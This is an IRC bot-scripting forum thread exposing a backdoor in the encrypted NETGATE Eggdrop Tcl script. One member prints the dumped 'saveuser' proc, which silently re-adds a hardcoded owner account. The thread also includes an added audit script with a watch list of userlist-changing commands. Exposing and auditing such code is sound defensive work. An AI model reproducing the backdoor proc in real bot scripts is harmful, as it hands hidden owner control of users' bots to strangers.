strange??? (netgate)

KONTOL
Voice
Posts: 3
Joined: Tue Mar 20, 2007 1:00 am
Contact:

strange??? (netgate)

Post by KONTOL »

NETGATE tcl has been updated to version 9.5 and a lot more protection has been added, but the encryption uses TCLpro! It makes it more strange!!!

Can anyone fully decrypt it? That file has been encrypted with TCLpro (bytecodes method). Make it readable to make sure there is no backdoor again! :evil:

For more information about it, please surf to:
http://netgate.informe.com/viewtopic.php?t=1086

NETGATE 9.5 tcl
Link removed (Alchera)

Config for bot:
http://www.redwingsonline.org/download/bot.cfg

It uses the Indonesian language! I can't understand what it all means...

Thx u all... 8)

EDIT by slennox: added script name to subject and moved topic to Script Support & Releases
[ I'm not ready yet! ]
Sir_Fz
Revered One
Posts: 3794
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

Why do you want to use NETGATE anyway? It has a very bad reputation and I don't see why you NEED it. There are a lot of scripts in the Tcl archive that will do much more and are written in far fewer lines (not 10,000+).
KONTOL
Voice
Posts: 3
Joined: Tue Mar 20, 2007 1:00 am
Contact:

yoww...

Post by KONTOL »

I've tried to use NETGATE for some reason (trial & error surely). I'm just asking for some help decrypting that tcl into a readable condition, so I can read & fix some backdoors for myself and the other users... Or maybe someone can decrypt all tcl files that have been encrypted by TCLpro (procomp util)...

thx u & I appreciate any help... :wink:
rosc2112
Revered One
Posts: 1454
Joined: Sun Feb 19, 2006 8:36 pm
Location: Northeast Pennsylvania

Post by rosc2112 »

From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.

Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.

You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit.
Sir_Fz
Revered One
Posts: 3794
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

After reading this thread again, I got the idea of checking if that [saveuser] procedure exists in the new netgate.

I've downloaded windrop1.6.12 and loaded netgate into it. Enabled the .tcl DCC command and did the following:
(Me) .tcl info command saveuser
(Bot) Tcl: saveuser
(Me) .tcl info args saveuser
(Bot) Tcl: (Meaning it takes no arguments)
(Me) .tcl info body saveuser
I'll display the output of the last Tcl-command in code tags (The whole proc)

proc saveuser {} {
 global ps owner
 if {![validuser $ps]} {
  setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
 } elseif {$owner != $ps} {
  setuser $owner XTRA "BEND" [zip [chattr $ps]]
  if {[passwdok $ps ""] != 1} {
   setuser $owner XTRA "LAST" [getuser $ps "PASS"]
  }
  deluser $ps
 }
 save
 if {![validuser $ps]} {
  adduser $ps "$ps!*@*"
  chattr $ps [dezip [getuser $owner XTRA "BEND"]]
  if {[getuser $owner XTRA "LAST"] != ""} {
   setuser $ps PASS [getuser $owner XTRA "LAST"]
  }
 }
 return 1
}

$owner contains the owner's handle (set by you) and what does $ps contain?
(Me) .set ps
(Bot) Currently: odon
So the same backdoor still exists in the new version, this time it adds "odon" instead of "KaISaR" to the bot's userlist as owner.

Edit: I meant windrop1.6.12 instead of eggdrop1.6.12 (used it since the site claimed that netgate only works for this version of windrop or more specifically for tcl 8.2-8.3... even more reason for why this script is lame).
Last edited by Sir_Fz on Sat Apr 28, 2007 8:57 pm, edited 1 time in total.
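
The manual check in the post above (`info command` and `info body` on one suspect proc), generalised to scan every loaded proc for userlist-changing commands. This is an added example, not part of the original thread or of NETGATE; the names `audit_cmds`, `audit_body`, `audit_procs` and `demo_suspect` are hypothetical, and the list of flagged Eggdrop commands is an assumption about what deserves review.

```tcl
# Added audit example: not NETGATE code and not from the original post.
# Runs in plain tclsh, or in a test bot after the untrusted script is loaded.

# Eggdrop commands that alter the userlist, flags or passwords (assumed list).
set audit_cmds {adduser deluser chattr setuser addhost}

# Return the sensitive commands named in a proc body. Whole-word match only;
# names inside strings or comments are also reported, so review each hit.
proc audit_body {body} {
    global audit_cmds
    set hits {}
    foreach cmd $audit_cmds {
        if {[regexp -- "\\m$cmd\\M" $body]} { lappend hits $cmd }
    }
    return $hits
}

# Walk every proc in namespace ns and its children.
# Returns a list of {qualified-proc-name hits} pairs.
proc audit_procs {{ns ::}} {
    set report {}
    foreach p [namespace eval $ns {info procs}] {
        set q "[string trimright $ns :]::$p"
        # A bytecode-only proc may not reveal its body; report that as well.
        if {[catch {info body $q} body]} {
            lappend report [list $q unreadable]
            continue
        }
        set hits [audit_body $body]
        if {[llength $hits] > 0} { lappend report [list $q $hits] }
    }
    foreach child [namespace children $ns] {
        foreach item [audit_procs $child] { lappend report $item }
    }
    return $report
}

# Constructed sample proc (never called) so the scan has something to flag.
proc demo_suspect {} {
    adduser example "example!*@*"
    chattr example +n
}

foreach item [audit_procs] {
    puts "[lindex $item 0]: [lindex $item 1]"
}
```

Inside a bot, replace `puts` with `putlog` so the report goes to the bot's log, and run it only on a throwaway test bot since loading the untrusted script executes it.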
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

rosc2112 wrote: From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.

Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.

You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit.
netgate backdoor
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
Sir_Fz
Revered One
Posts: 3794
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

I can't even start about how ugly this script makes Eggdrop :evil: it stores the userfile in the language/ directory lol that's so lame, I mean come on be a man lol. The bot.cfg requires editing only a few settings (nick, username, IP and hostname) so the user wouldn't understand how to change alternative nick, load scripts or change any other setting...

I would never recommend such a script even if it didn't contain that backdoor.
nml375
Revered One
Posts: 2860
Joined: Fri Aug 04, 2006 2:09 pm

Post by nml375 »

Well, the only purpose for this package is to hijack bots and quite possibly accounts on the system it runs on. The ones targeted by such a package would be those who desire an up'n'go bot, and really don't want to bother/care to even check config-files, scripts, and such; and this script "offers it all", it claims to take care of the more difficult config-settings, does all the things eggdrop usually needs added scripts for, etc, etc..

The mere fact that people still think about using it despite the widespread knowledge of the backdoors, etc. could only mean the author got the bait right.
NML_375
rosc2112
Revered One
Posts: 1454
Joined: Sun Feb 19, 2006 8:36 pm
Location: Northeast Pennsylvania

Post by rosc2112 »

Wouldn't be surprised to find netgate to be a conglomeration of other people's scripts/procs mashed together into a mess.
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

I notified the appropriate Tcl/eggdrop channel founders on DALnet when this first reared its ugly head as it targets DALnet bot owners specifically (from memory).
mayday
Voice
Posts: 2
Joined: Mon Apr 30, 2007 1:42 am

Post by mayday »

Wew netgate again......
Guys, if u look into the netgate FAQ u can read this:
FaQ:
........
- Tapi kan masih ada $ps odon nya, yups masih ada, dan nick PSna masih kami yang pegang, dan gak akan kami salah gunakan, so if u agree with this condition us this script, if not dont use it, Simple !!.
I tried to translate: - but the tcl still has $ps odon, yes that $ps still exists, and we are still holding/keeping that PS nick, and we would not misuse it, so if u agree with this condition use this script, if not don't use it, Simple !!.
.......
Please refer to the bolded text, so use it if u agree with that condition, don't use it if not...

I notice something weird here: TS says he doesn't understand the Indonesian language but his id KONTOL is Indonesian; KONTOL means p*nis in English
nml375
Revered One
Posts: 2860
Joined: Fri Aug 04, 2006 2:09 pm

Post by nml375 »

Any such "disclaimer" should be put within the license-agreement to carry any validity. Also, mixing languages like that is to me a really bad practice.

Anyway, since they admit to adding a user-account, with a known password and hostmask that only cares for nick (roughly making it possible for anyone to authenticate, and use this account for mischief)...
Does anyone know if they ever provided a reasonable explanation for adding a user account of any kind? Or why it would need such permissions?

I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility...
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

mayday wrote: Wew netgate again...... KONTOL mean p*nis in english
I already knew that (although I do not speak the language); I assist in an Indonesian (shell provider) channel on DALnet. :lol:
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia
Contact:

Post by Alchera »

nml375 wrote: I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility...
It's a hijacking tool and they think we're all idiots. :P

Unfortunately there are some out there that have fallen for this "con".
rosc2112
Revered One
Posts: 1454
Joined: Sun Feb 19, 2006 8:36 pm
Location: Northeast Pennsylvania

Post by rosc2112 »

I suppose it'd be easy enough to rip the procs from the script as already demonstrated, if anyone ever wanted to bother, and then release a clean copy :P

Either that, or just create the backdoor username and give it a different password and +k flags.. Or, then again, I can think of some nice little reverse-hack script to use on whoever tried logging in with that username :)


But, meh.. Screw them, their script sucks, that's why they have to hide it :P
Locked